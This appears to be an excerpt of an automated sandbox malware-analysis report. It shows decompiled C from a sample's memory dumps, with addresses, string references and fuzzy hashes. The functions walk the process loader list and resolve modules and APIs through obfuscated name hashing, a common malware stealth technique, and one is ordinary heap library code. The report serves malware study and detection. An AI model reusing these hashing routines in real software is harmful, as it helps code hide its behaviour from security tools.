				signed int _t93;
				signed int _t97;
				intOrPtr* _t100;
				signed short* _t103;
				signed int _t108;
				signed int _t113;
				intOrPtr* _t115;
				void* _t118;

				 *((intOrPtr*)(_t118 + 0xc)) = __ecx;
				_t100 =  *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc;
				 *((intOrPtr*)(_t118 + 0x18)) = _t100;
				_t115 =  *_t100;
				if(_t115 == _t100) {
					L10:
					return 0;
				} else {
					do {
						_t103 =  *(_t115 + 0x30);
						 *(_t118 + 0x14) = 0x9c4e;
						 *(_t118 + 0x14) =  *(_t118 + 0x14) + 0x4464;
						 *(_t118 + 0x14) =  *(_t118 + 0x14) >> 1;
						 *(_t118 + 0x14) =  *(_t118 + 0x14) + 0xffff87db;
						 *(_t118 + 0x14) =  *(_t118 + 0x14) + 0xffff18d7;
						 *(_t118 + 0x14) =  *(_t118 + 0x14) + 0xffff529c;
						 *(_t118 + 0x14) =  *(_t118 + 0x14) + 0xffff507b;
						 *(_t118 + 0x14) =  *(_t118 + 0x14) | 0x3b9f69dc;
						 *(_t118 + 0x14) =  *(_t118 + 0x14) ^ 0xfffffdfe;
						 *(_t118 + 0x10) = 0x31f8;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) * 0x75;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0x67893507;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0x679fe359;
						 *(_t118 + 0x10) = 0x4955;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0xa8908194;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) >> 8;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) + 0xffffdf1d;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) + 0xfffff42f;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) | 0x02e6e862;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) + 0xa6c2;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0xe36c9a70;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0xe1830958;
						if( *_t103 != 0) {
							do {
								_t97 =  *(_t118 + 0x14);
								 *(_t118 + 0x10) = 0x31f8;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) * 0x75;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0x67893507;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0x679fe359;
								 *(_t118 + 0x10) = 0x4955;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0xa8908194;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) >> 8;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) + 0xffffdf1d;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) + 0xfffff42f;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) | 0x02e6e862;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) + 0xa6c2;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0xe36c9a70;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0xe1830958;
								_t113 =  *(_t118 + 0x14) << ( *(_t118 + 0x10) & 0x000000ff);
								_t93 =  *_t103 & 0x0000ffff;
								_t108 =  *(_t118 + 0x14) << ( *(_t118 + 0x10) & 0x000000ff);
								if(_t93 >= 0x41 && _t93 <= 0x5a) {
									_t93 = _t93 + 0x20;
								}
								 *(_t118 + 0x14) = _t93;
								_t103 =  &(_t103[1]);
								 *(_t118 + 0x14) =  *(_t118 + 0x14) + _t113;
								 *(_t118 + 0x14) =  *(_t118 + 0x14) + _t108;
								 *(_t118 + 0x14) =  *(_t118 + 0x14) - _t97;
							} while ( *_t103 != 0);
							_t100 =  *((intOrPtr*)(_t118 + 0x18));
						}
						if(( *(_t118 + 0x14) ^ 0x344765f2) ==  *((intOrPtr*)(_t118 + 0x1c))) {
							return  *((intOrPtr*)(_t115 + 0x18));
						} else {
							goto L9;
						}
						goto L12;
						L9:
						_t115 =  *_t115;
					} while (_t115 != _t100);
					goto L10;
				}
				L12:
			}

0x02233f29
0x02233f32
0x02233f37
0x02233f3b
0x02233f3f
0x022340cb
0x022340d4
0x02233f45
0x02233f45
0x02233f45
0x02233f48
0x02233f50
0x02233f58
0x02233f5c
0x02233f64
0x02233f6c
0x02233f74
0x02233f7c
0x02233f84
0x02233f8c
0x02233f99
0x02233f9d
0x02233fa5
0x02233fad
0x02233fb5
0x02233fbd
0x02233fc2
0x02233fca
0x02233fd2
0x02233fda
0x02233fe2
0x02233fea
0x02233ff6
0x02234000
0x02234000
0x02234004
0x02234011
0x02234015
0x0223401d
0x0223402e
0x02234036
0x0223403e
0x02234043
0x0223404b
0x02234053
0x0223405b
0x02234063
0x0223406b
0x02234073
0x0223407e
0x02234081
0x02234086
0x0223408d
0x0223408d
0x02234090
0x02234094
0x02234097
0x0223409b
0x0223409f
0x022340a3
0x022340ad
0x022340ad
0x022340be
0x022340df
0x00000000
0x00000000
0x00000000
0x00000000
0x022340c0
0x022340c0
0x022340c3
0x00000000
0x02233f45
0x00000000

Strings

dD, xrefs: 02233F50
UI, xrefs: 0223402E

Memory Dump Source

Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true

Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID:
String ID: UI$dD
API String ID: 0-2678678791
Opcode ID: 5b0b6e09fcfe7a652f9b1521d2d76371d588ae290acbf1882c862c8981155b4e
Instruction ID: 219cd9113a0529c49ec066d2932fa8ea2e25a26c3787037299d77ca87df5f2a2
Opcode Fuzzy Hash: 5b0b6e09fcfe7a652f9b1521d2d76371d588ae290acbf1882c862c8981155b4e
Instruction Fuzzy Hash: 6741E3B65083838BD394CF24E54651BBBF0FB90724F440E5DE4A1962A4D3B5DA4DCB93

Uniqueness

Uniqueness Score: -1.00%

Function 02233D10, Relevance: 2.6, Strings: 2, Instructions: 71
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E02233D10(signed short* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _t58;
				signed int _t60;
				signed short* _t65;
				signed int _t68;
				signed int _t72;

				_v4 = 0x9c4e;
				_t65 = __ecx;
				_v4 = _v4 + 0x4464;
				_v4 = _v4 >> 1;
				_v4 = _v4 + 0xffff87db;
				_v4 = _v4 + 0xffff18d7;
				_v4 = _v4 + 0xffff529c;
				_v4 = _v4 + 0xffff507b;
				_v4 = _v4 | 0x3b9f69dc;
				_v4 = _v4 ^ 0xfffffdfe;
				_v8 = 0x31f8;
				_v8 = _v8 * 0x75;
				_v8 = _v8 ^ 0x67893507;
				_v8 = _v8 ^ 0x679fe359;
				_v8 = 0x4955;
				_v8 = _v8 ^ 0xa8908194;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xffffdf1d;
				_v8 = _v8 + 0xfffff42f;
				_v8 = _v8 | 0x02e6e862;
				_v8 = _v8 + 0xa6c2;
				_v8 = _v8 ^ 0xe36c9a70;
				_v8 = _v8 ^ 0xe1830958;
				if( *((short*)(__ecx)) != 0) {
					do {
						_t60 = _v4;
						_v8 = 0x31f8;
						_v8 = _v8 * 0x75;
						_v8 = _v8 ^ 0x67893507;
						_v8 = _v8 ^ 0x679fe359;
						_v8 = 0x4955;
						_v8 = _v8 ^ 0xa8908194;
						_v8 = _v8 >> 8;
						_v8 = _v8 + 0xffffdf1d;
						_v8 = _v8 + 0xfffff42f;
						_v8 = _v8 | 0x02e6e862;
						_v8 = _v8 + 0xa6c2;
						_v8 = _v8 ^ 0xe36c9a70;
						_v8 = _v8 ^ 0xe1830958;
						_t72 = _v4 << (_v8 & 0x000000ff);
						_t58 =  *_t65 & 0x0000ffff;
						_t68 = _v4 << (_v8 & 0x000000ff);
						if(_t58 >= 0x41 && _t58 <= 0x5a) {
							_t58 = _t58 + 0x20;
						}
						_v4 = _t58;
						_t65 =  &(_t65[1]);
						_v4 = _v4 + _t72;
						_v4 = _v4 + _t68;
						_v4 = _v4 - _t60;
					} while ( *_t65 != 0);
				}
				return _v4;
			}

0x02233d13
0x02233d1b
0x02233d1d
0x02233d25
0x02233d29
0x02233d31
0x02233d39
0x02233d41
0x02233d49
0x02233d51
0x02233d59
0x02233d64
0x02233d67
0x02233d6e
0x02233d75
0x02233d7c
0x02233d83
0x02233d87
0x02233d8e
0x02233d95
0x02233d9c
0x02233da3
0x02233daa
0x02233db5
0x02233dc0
0x02233dc0
0x02233dc4
0x02233dd1
0x02233dd5
0x02233ddd
0x02233dee
0x02233df6
0x02233dfe
0x02233e03
0x02233e0b
0x02233e13
0x02233e1b
0x02233e23
0x02233e2b
0x02233e33
0x02233e3e
0x02233e41
0x02233e46
0x02233e4d
0x02233e4d
0x02233e50
0x02233e54
0x02233e57
0x02233e5b
0x02233e5f
0x02233e63
0x02233e6f
0x02233e77

Strings

dD, xrefs: 02233D1D
UI, xrefs: 02233DEE

Memory Dump Source

Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true

Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID:
String ID: UI$dD
API String ID: 0-2678678791
Opcode ID: 82085eb77aa1e6d6502ea5e6256e2cd79fe0ef0b357a1ba66029e8c86d29f621
Instruction ID: abd7def324b187cfd8a3cae211198b00ac19f47232d130a60b8191d20e68234f
Opcode Fuzzy Hash: 82085eb77aa1e6d6502ea5e6256e2cd79fe0ef0b357a1ba66029e8c86d29f621
Instruction Fuzzy Hash: B331BFB2508342AFD3849E2AC54611EBBF0BB90724F46CD5DE0E9861A4D3B88989CF42

Uniqueness

Uniqueness Score: -1.00%

Function 02233BA0, Relevance: 2.6, Strings: 2, Instructions: 66
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E02233BA0(char* __ecx) {
				signed int _v4;
				signed int _v8;
				char* _t83;

				_v4 = 0x9c4e;
				_v4 = _v4 + 0x4464;
				_v4 = _v4 >> 1;
				_v4 = _v4 + 0xffff87db;
				_v4 = _v4 + 0xffff18d7;
				_v4 = _v4 + 0xffff529c;
				_v4 = _v4 + 0xffff507b;
				_v4 = _v4 | 0x3b9f69dc;
				_v4 = _v4 ^ 0xfffffdfe;
				_v8 = 0x31f8;
				_t83 = __ecx;
				_v8 = _v8 * 0x75;
				_v8 = _v8 ^ 0x67893507;
				_v8 = _v8 ^ 0x679fe359;
				_v8 = 0x4955;
				_v8 = _v8 ^ 0xa8908194;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xffffdf1d;
				_v8 = _v8 + 0xfffff42f;
				_v8 = _v8 | 0x02e6e862;
				_v8 = _v8 + 0xa6c2;
				_v8 = _v8 ^ 0xe36c9a70;
				_v8 = _v8 ^ 0xe1830958;
				if( *__ecx != 0) {
					do {
						_t83 = _t83 + 1;
						_v8 = 0x31f8;
						_v8 = _v8 * 0x75;
						_v8 = _v8 ^ 0x67893507;
						_v8 = _v8 ^ 0x679fe359;
						_v8 = 0x4955;
						_v8 = _v8 ^ 0xa8908194;
						_v8 = _v8 >> 8;
						_v8 = _v8 + 0xffffdf1d;
						_v8 = _v8 + 0xfffff42f;
						_v8 = _v8 | 0x02e6e862;
						_v8 = _v8 + 0xa6c2;
						_v8 = _v8 ^ 0xe36c9a70;
						_v8 = _v8 ^ 0xe1830958;
						_v4 =  *((char*)(_t83 - 1));
						_v4 = _v4 + (_v4 << (_v8 & 0x000000ff));
						_v4 = _v4 + (_v4 << (_v8 & 0x000000ff));
						_v4 = _v4 - _v4;
					} while ( *_t83 != 0);
				}
				return _v4;
			}

0x02233ba3
0x02233bab
0x02233bb3
0x02233bb7
0x02233bbf
0x02233bc7
0x02233bcf
0x02233bd7
0x02233bdf
0x02233be7
0x02233bf3
0x02233bf5
0x02233bf9
0x02233c01
0x02233c09
0x02233c11
0x02233c19
0x02233c1e
0x02233c26
0x02233c2e
0x02233c36
0x02233c3e
0x02233c46
0x02233c51
0x02233c60
0x02233c64
0x02233c67
0x02233c74
0x02233c78
0x02233c80
0x02233c91
0x02233c99
0x02233ca1
0x02233ca6
0x02233cae
0x02233cb6
0x02233cbe
0x02233cc6
0x02233cce
0x02233ce5
0x02233ce9
0x02233cef
0x02233cf3
0x02233cf7
0x02233d01
0x02233d0a

Strings

UI, xrefs: 02233C91
UI, xrefs: 02233C09

Memory Dump Source

Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true

Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID:
String ID: UI$UI
API String ID: 0-658841096
Opcode ID: 8fb8486042db03a29a3c642504b4275772910a8ab76727c30505b2b065e064e3
Instruction ID: 423d09612a974c53eb27a64e3f01ebfbe890b874c9ecf00de9eea2cf56467e7d
Opcode Fuzzy Hash: 8fb8486042db03a29a3c642504b4275772910a8ab76727c30505b2b065e064e3
Instruction Fuzzy Hash: 1E31D0B5509342AFD395CE29C64A60FBBF0BB84B24F44CD5DE4E9921A4D3788909DF43

Uniqueness

Uniqueness Score: -1.00%

Function 00409C48, Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00409C4D

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f557690f28c1f672e179aac3153d04dc0e65bf5786f1d79d99cffc9af07c7071
Instruction ID: 03bcb520bf2f563af268e7b5ec2d2dff604110816e44dfc8923e142131883431
Opcode Fuzzy Hash: f557690f28c1f672e179aac3153d04dc0e65bf5786f1d79d99cffc9af07c7071
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 02231C70, Relevance: 1.4, Strings: 1, Instructions: 106
COMMONCrypto

Download Yara Rule

C-Code - Quality: 66%

			E02231C70(void* __ecx) {
				char _v4;
				signed int _v8;
				signed int _v12;
				void* __ebx;
				void* __ebp;
				intOrPtr* _t57;
				signed int _t58;
				intOrPtr* _t64;
				signed int _t65;
				intOrPtr* _t67;
				int _t73;
				void* _t78;
				signed int _t80;
				signed int _t91;
				void* _t110;
				void* _t114;
				void* _t115;
				signed int _t117;
				signed int* _t118;

				_t118 =  &_v12;
				_v8 = 0xac2a;
				_v8 = _v8 ^ 0xfb427452;
				_v8 = _v8 | 0x0433d0b5;
				_v8 = _v8 ^ 0xff73d8f5;
				_v12 = 0xb90d;
				_v12 = _v12 + 0xffffc883;
				_v12 = _v12 + 0xffff4556;
				_v12 = _v12 + 0xffff66fa;
				_v12 = _v12 + 0xffff302a;
				_v12 = _v12 + 0xffffad71;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0xe0b7b010;
				_t57 =  *0x223dd4c;
				_t114 = __ecx;
				if(_t57 == 0) {
					_t57 = E02233E80(_t78, E02233F20(0xbb398380), 0xae3c1a47, _t115);
					 *0x223dd4c = _t57;
				}
				_t58 =  *_t57();
				_v12 = 0x788;
				_v12 = _v12 >> 0xc;
				_t117 = _v8 + _t58 % _v12;
				_v12 = _v12 + 0xffff671b;
				_v12 = _v12 ^ 0x6acd08c3;
				_v12 = _v12 * 0x32;
				_v12 = _v12 + 0xffff2d32;
				_v12 = _v12 ^ 0x491450b8;
				_v12 = (_v12 - (0x29e4129f * _v12 >> 0x20) >> 1) + (0x29e4129f * _v12 >> 0x20) >> 6;
				_v12 = _v12 ^ 0x00f88eb6;
				_v8 = 0x2ce8;
				_v8 = _v8 + 0xffffe7d1;
				_v8 = _v8 * 0x4b;
				_v8 = _v8 + 0x84e;
				_v8 = _v8 ^ 0x00061a91;
				_t64 =  *0x223dd4c;
				if(_t64 == 0) {
					_t64 = E02233E80(_t78, E02233F20(0xbb398380), 0xae3c1a47, _t117);
					 *0x223dd4c = _t64;
				}
				_t65 =  *_t64();
				_t67 =  *0x223dd4c;
				_t80 = _v12 + _t65 % _v8;
				if(_t67 == 0) {
					_t67 = E02233E80(_t80, E02233F20(0xbb398380), 0xae3c1a47, _t117);
					 *0x223dd4c = _t67;
				}
				_v4 =  *_t67();
				if(_t117 != 0) {
					_t110 = _t114;
					_t91 = _t117 >> 1;
					_t114 = _t114 + _t117 * 2;
					_t73 = memset(_t110, 0x2d002d, _t91 << 2);
					asm("adc ecx, ecx");
					memset(_t110 + _t91, _t73, 0);
					_t118 =  &(_t118[6]);
				}
				E02234ED0(_t114, _t80,  &_v4);
				 *((short*)(_t114 + _t80 * 2)) = 0;
				return 0;
			}

0x02231c70
0x02231c73
0x02231c7b
0x02231c83
0x02231c8b
0x02231c93
0x02231c9a
0x02231ca1
0x02231ca8
0x02231caf
0x02231cb6
0x02231cbd
0x02231cc1
0x02231cc8
0x02231cd0
0x02231cd4
0x02231ce7
0x02231cec
0x02231cec
0x02231cf1
0x02231cff
0x02231d07
0x02231d0c
0x02231d0e
0x02231d16
0x02231d23
0x02231d2c
0x02231d34
0x02231d4b
0x02231d4f
0x02231d57
0x02231d5f
0x02231d6c
0x02231d70
0x02231d78
0x02231d80
0x02231d87
0x02231d9a
0x02231d9f
0x02231d9f
0x02231da4
0x02231db2
0x02231db7
0x02231dbb
0x02231dce
0x02231dd3
0x02231dd3
0x02231dda
0x02231de0
0x02231de5
0x02231de7
0x02231de9
0x02231df1
0x02231df3
0x02231df5
0x02231df5
0x02231df8
0x02231e02
0x02231e0c
0x02231e16

Strings

,, xrefs: 02231D57

Memory Dump Source

Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true

Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID:
String ID: ,
API String ID: 0-48859977
Opcode ID: 4a693e48f3b638d3c8b9fd6831aa04809d268af8264f1953605d453153a1550c
Instruction ID: 18bfdedd8e2bf8a5fbbec0a0b785a9b33452003b8d4baa3fd39dd7a56ef68afa
Opcode Fuzzy Hash: 4a693e48f3b638d3c8b9fd6831aa04809d268af8264f1953605d453153a1550c
Instruction Fuzzy Hash: 034169B5A183069BC748EFA8E41412AB7E2AFC5314F00CD2DF4D68B254EB7899158F82

Uniqueness

Uniqueness Score: -1.00%

Function 00408293, Relevance: .3, Instructions: 259
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 100%

			E00408293(signed int* _a4, intOrPtr* _a8, char _a11, signed int _a12, char _a15) {
				signed int _v8;
				signed char _v12;
				intOrPtr _v16;
				intOrPtr _t186;
				void* _t187;
				signed int _t188;
				signed int* _t189;
				intOrPtr _t191;
				signed int* _t192;
				signed int* _t193;
				signed char _t194;
				intOrPtr _t195;
				intOrPtr* _t196;
				signed int _t199;
				signed int _t202;
				signed int _t207;
				signed int _t209;
				signed int _t218;
				signed int _t221;
				signed int* _t222;
				signed int _t227;
				intOrPtr _t228;
				intOrPtr _t229;
				intOrPtr _t230;
				char _t233;
				signed int _t234;
				signed char _t235;
				signed int* _t237;
				signed int* _t239;
				signed int* _t244;
				signed int* _t245;
				signed char _t250;
				intOrPtr _t256;
				signed int _t257;
				char _t258;
				char _t259;
				signed char _t260;
				signed int* _t262;
				signed int* _t267;
				signed int* _t268;
				char* _t270;
				signed int _t274;
				unsigned int _t275;
				intOrPtr _t277;
				unsigned int _t278;
				intOrPtr* _t280;
				void* _t281;
				signed char _t290;
				signed int _t292;
				signed char _t295;
				signed int _t298;
				signed int _t302;
				signed int* _t304;

				_t222 = _a4;
				_t280 = _a8;
				_t186 =  *((intOrPtr*)(_t222 + 0x10));
				_t292 = _a12 + 0x00000017 & 0xfffffff0;
				_t274 = _t280 -  *((intOrPtr*)(_t222 + 0xc)) >> 0xf;
				_v16 = _t274 * 0x204 + _t186 + 0x144;
				_t227 =  *((intOrPtr*)(_t280 - 4)) - 1;
				_a12 = _t227;
				_t194 =  *(_t227 + _t280 - 4);
				_t281 = _t227 + _t280 - 4;
				_v8 = _t194;
				if(_t292 <= _t227) {
					if(__eflags < 0) {
						_t195 = _a8;
						_a12 = _a12 - _t292;
						_t228 = _t292 + 1;
						 *((intOrPtr*)(_t195 - 4)) = _t228;
						_t196 = _t195 + _t292 - 4;
						_a8 = _t196;
						_t295 = (_a12 >> 4) - 1;
						 *((intOrPtr*)(_t196 - 4)) = _t228;
						__eflags = _t295 - 0x3f;
						if(_t295 > 0x3f) {
							_t295 = 0x3f;
						}
						__eflags = _v8 & 0x00000001;
						if((_v8 & 0x00000001) == 0) {
							_t298 = (_v8 >> 4) - 1;
							__eflags = _t298 - 0x3f;
							if(_t298 > 0x3f) {
								_t298 = 0x3f;
							}
							__eflags =  *((intOrPtr*)(_t281 + 4)) -  *((intOrPtr*)(_t281 + 8));
							if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
								__eflags = _t298 - 0x20;
								if(_t298 >= 0x20) {
									_t128 = _t298 - 0x20; // -32
									_t130 = _t186 + 4; // 0x4
									_t244 = _t298 + _t130;
									_t199 =  !(0x80000000 >> _t128);
									 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
									 *_t244 =  *_t244 - 1;
									__eflags =  *_t244;
									if( *_t244 == 0) {
										_t245 = _a4;
										_t138 = _t245 + 4;
										 *_t138 =  *(_t245 + 4) & _t199;
										__eflags =  *_t138;
									}
								} else {
									_t304 = _t298 + _t186 + 4;
									_t202 =  !(0x80000000 >> _t298);
									 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
									 *_t304 =  *_t304 - 1;
									__eflags =  *_t304;
									if( *_t304 == 0) {
										 *_a4 =  *_a4 & _t202;
									}
								}
								_t196 = _a8;
							}
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
							_t302 = _a12 + _v8;
							_a12 = _t302;
							_t295 = (_t302 >> 4) - 1;
							__eflags = _t295 - 0x3f;
							if(_t295 > 0x3f) {
								_t295 = 0x3f;
							}
						}
						_t229 = _v16;
						_t230 = _t229 + _t295 * 8;
						 *((intOrPtr*)(_t196 + 4)) =  *((intOrPtr*)(_t229 + 4 + _t295 * 8));
						 *((intOrPtr*)(_t196 + 8)) = _t230;
						 *((intOrPtr*)(_t230 + 4)) = _t196;
						 *((intOrPtr*)( *((intOrPtr*)(_t196 + 4)) + 8)) = _t196;
						__eflags =  *((intOrPtr*)(_t196 + 4)) -  *((intOrPtr*)(_t196 + 8));
						if( *((intOrPtr*)(_t196 + 4)) ==  *((intOrPtr*)(_t196 + 8))) {
							_t233 =  *(_t295 + _t186 + 4);
							__eflags = _t295 - 0x20;
							_a11 = _t233;
							_t234 = _t233 + 1;
							__eflags = _t234;
							 *(_t295 + _t186 + 4) = _t234;
							if(_t234 >= 0) {
								__eflags = _a11;
								if(_a11 == 0) {
									_t237 = _a4;
									_t176 = _t237 + 4;
									 *_t176 =  *(_t237 + 4) | 0x80000000 >> _t295 - 0x00000020;
									__eflags =  *_t176;
								}
								_t189 = _t186 + 0xc4 + _t274 * 4;
								_t235 = _t295 - 0x20;
								_t275 = 0x80000000;
							} else {
								__eflags = _a11;
								if(_a11 == 0) {
									_t239 = _a4;
									 *_t239 =  *_t239 | 0x80000000 >> _t295;
									__eflags =  *_t239;
								}
								_t189 = _t186 + 0x44 + _t274 * 4;
								_t275 = 0x80000000;
								_t235 = _t295;
							}
							 *_t189 =  *_t189 | _t275 >> _t235;
							__eflags =  *_t189;
						}
						_t188 = _a12;
						 *_t196 = _t188;
						 *((intOrPtr*)(_t188 + _t196 - 4)) = _t188;
					}
					L52:
					_t187 = 1;
					return _t187;
				}
				if((_t194 & 0x00000001) != 0 || _t292 > _t194 + _t227) {
					return 0;
				} else {
					_t250 = (_v8 >> 4) - 1;
					_v12 = _t250;
					if(_t250 > 0x3f) {
						_t250 = 0x3f;
						_v12 = _t250;
					}
					if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
						if(_t250 >= 0x20) {
							_t267 = _v12 + _t186 + 4;
							_t218 =  !(0x80000000 >> _t250 + 0xffffffe0);
							 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
							 *_t267 =  *_t267 - 1;
							__eflags =  *_t267;
							if( *_t267 == 0) {
								_t268 = _a4;
								_t44 = _t268 + 4;
								 *_t44 =  *(_t268 + 4) & _t218;
								__eflags =  *_t44;
							}
						} else {
							_t270 = _v12 + _t186 + 4;
							_t221 =  !(0x80000000 >> _t250);
							 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
							 *_t270 =  *_t270 - 1;
							if( *_t270 == 0) {
								 *_a4 =  *_a4 & _t221;
							}
						}
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
					_v8 = _v8 + _a12 - _t292;
					if(_v8 <= 0) {
						_t277 = _a8;
					} else {
						_t290 = (_v8 >> 4) - 1;
						_t256 = _a8 + _t292 - 4;
						if(_t290 > 0x3f) {
							_t290 = 0x3f;
						}
						_t207 = _v16 + _t290 * 8;
						_a12 = _t207;
						 *((intOrPtr*)(_t256 + 4)) =  *((intOrPtr*)(_t207 + 4));
						_t209 = _a12;
						 *(_t256 + 8) = _t209;
						 *((intOrPtr*)(_t209 + 4)) = _t256;
						 *((intOrPtr*)( *((intOrPtr*)(_t256 + 4)) + 8)) = _t256;
						if( *((intOrPtr*)(_t256 + 4)) ==  *(_t256 + 8)) {
							_t258 =  *((intOrPtr*)(_t290 + _t186 + 4));
							_a15 = _t258;
							_t259 = _t258 + 1;
							 *((char*)(_t290 + _t186 + 4)) = _t259;
							if(_t259 >= 0) {
								__eflags = _a15;
								if(_a15 == 0) {
									_t84 = _t290 - 0x20; // -33
									_t262 = _a4;
									_t86 = _t262 + 4;
									 *_t86 =  *(_t262 + 4) | 0x80000000 >> _t84;
									__eflags =  *_t86;
								}
								_t193 = _t186 + 0xc4 + _t274 * 4;
								_t91 = _t290 - 0x20; // -33
								_t260 = _t91;
								_t278 = 0x80000000;
							} else {
								if(_a15 == 0) {
									 *_a4 =  *_a4 | 0x80000000 >> _t290;
								}
								_t193 = _t186 + 0x44 + _t274 * 4;
								_t278 = 0x80000000;
								_t260 = _t290;
							}
							 *_t193 =  *_t193 | _t278 >> _t260;
						}
						_t277 = _a8;
						_t257 = _v8;
						_t192 = _t277 + _t292 - 4;
						 *_t192 = _t257;
						 *(_t257 + _t192 - 4) = _t257;
					}
					_t191 = _t292 + 1;
					 *((intOrPtr*)(_t277 - 4)) = _t191;
					 *((intOrPtr*)(_t277 + _t292 - 8)) = _t191;
					goto L52;
				}
			}

0x00408299
0x004082a2
0x004082ad
0x004082b0
0x004082b3
0x004082c5
0x004082cb
0x004082ce
0x004082d1
0x004082d5
0x004082d9
0x004082dc
0x00408441
0x00408447
0x0040844a
0x0040844d
0x00408450
0x00408453
0x0040845a
0x00408460
0x00408461
0x00408464
0x00408467
0x0040846b
0x0040846b
0x0040846c
0x00408470
0x0040847c
0x0040847d
0x00408480
0x00408484
0x00408484
0x00408488
0x0040848b
0x0040848d
0x00408490
0x004084b0
0x004084ba
0x004084ba
0x004084be
0x004084c0
0x004084c7
0x004084c7
0x004084c9
0x004084cb
0x004084ce
0x004084ce
0x004084ce
0x004084ce
0x00408492
0x0040849b
0x0040849f
0x004084a1
0x004084a5
0x004084a5
0x004084a7
0x004084ac
0x004084ac
0x004084a7
0x004084d1
0x004084d1
0x004084da
0x004084e3
0x004084e9
0x004084ec
0x004084f2
0x004084f3
0x004084f6
0x004084fa
0x004084fa
0x004084f6
0x004084fb
0x00408502
0x00408505
0x00408508
0x0040850b
